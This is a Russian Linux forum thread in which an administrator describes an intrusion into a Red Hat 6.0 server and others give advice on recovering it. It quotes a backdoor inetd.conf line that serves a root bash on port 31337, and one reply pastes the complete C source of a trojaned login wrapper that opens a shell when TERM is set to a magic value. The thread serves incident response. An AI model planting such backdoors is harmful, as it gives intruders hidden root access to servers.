LINUX.ORG.RU
ФорумAdmin

Меня ломанули


0

0

Админы, как правильно настроить защиту сервера?
Ночью меня вскрыли. messages чист, сообщения перенаправлены в null, в inetd.conf открыли доступ через telnet:

31337 stream tcp nowait root /bin/bash bash -i
telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
хотя до этого он был закрыт, ftp тоже закрыт.
Утром сервер занимался прощупыванием или вскрытием других машин в сети на 111 порту.
ps работает не правильно, видать заменен.
Bind обновлялся. Чем-то похоже на Lion - тоже сканирует другие машины в сети, но явно не он - его следов нет.
Система Red Hat Linux 6.0
У кого подобное было или кто знает, что делать?
Сейчас подправил inetd.conf, сменил пароли, в rc.sysinit закоментировал перенаправление сообщений в null.
До этого кто-то активно пытался пролезть через ftp.

anonymous

Re: Меня ломанули

netstat -lntp что выдает??? Если скажет что какая-то опция неправильная - значит его тоже подменили. А вообще должно показать все открытые порты.

Ale ()

Re: Меня ломанули

Порты показывает, вроде правильно
Yuriy

anonymous ()

Re: Меня ломанули

syslogd login sshd ls du ps pstree killall top netstat вот эти бинрники чаще всего заменяют ! а еще посмотри на наличие процессов запущенных с именем : [httpd] или что то похоже ! или например на предмет запущенных программ из /usr/doc/, и наконец новых юзеров с id=0 и gid=0 :-) и удачи !в этом нелегком деле ! восстановлении сервера :-))

anonymous ()

Re: Меня ломанули

Какой версии bind ?
На мой взгляд лучше все снести и заново поставить с последним bind,
чем тратить время на выискивание следов.
Кстати, RH6.0 часто ломают, по крайней мере, в этом форуме это не
первое сообщение о взломе, и даже не третье.

anonymous ()

Re: Меня ломанули

Вообще в таких случаях советуют полностью переставлять сервер с trusted media так как могут остаться трояны

anonymous ()

Re: Меня ломанули

Сервер переставлялся недавно, сразу же обновлялся BIND. А какие программы или методы используются для защиты от сканирования свободных портов? Потому что мне приходят письма - типа того, что вы проявляли подозрительную активность по отношению к такому-то по 111 порту. Значит, это можно отследить. Что это вообще за порт? Как закрыть все лишнее?
PS. А можно сделать upgrade на Red Hat 7.0? При этом замененные файлы по идее должны восстановиться... Настройки сервера останутся в силе или нет? Вот только если троян...

Yuriy

anonymous ()

Re: Меня ломанули

В каталоге /usr есть каталог .SC с файлом bj.c
Я пока еще не специалист в Линуксе, но что-то тут явно не то, ИМХО.
Могу привести текст файла:
#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <sys/time.h>
#include <string.h>
#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/sbin/login"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "mc1a"
#define ENV_FIX "vt100"


int owned(void);
char **av, **ep;
int main(int argc, char **argv, char **envp) {
av=argv;
ep=envp;
av[0]=SHELL_CALLME;

if (owned()) {
char *sav[]={ SHELL_CALLME, NULL };
execve(SHELL, sav, ep);
return 0;
}

execve(LOGIN, av, ep);
return 0;

}

int owned(void) {
char *name, *value;
int i;
for (i=0; ep[i]!=NULL; ++i) {
name=strtok(ep[i], "=");
value=strtok(NULL, "=");
if (name==NULL || value==NULL) continue;
if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
char tmp[100];
sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
ep[i]=strdup(tmp);
return 1;
}
}
}


return 0;
}

Может у кого есть идеи?

anonymous ()

Re: Меня ломанули

Проверь все с помощью rpm.
пока не проверишь с помощью rpm - не верь ни одной утилите типа ps netstat top и т.д.
когда проверишь - тоже не верь...

а лучше переустановить сервак полностью!

bind - chroot&update !

desperado ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.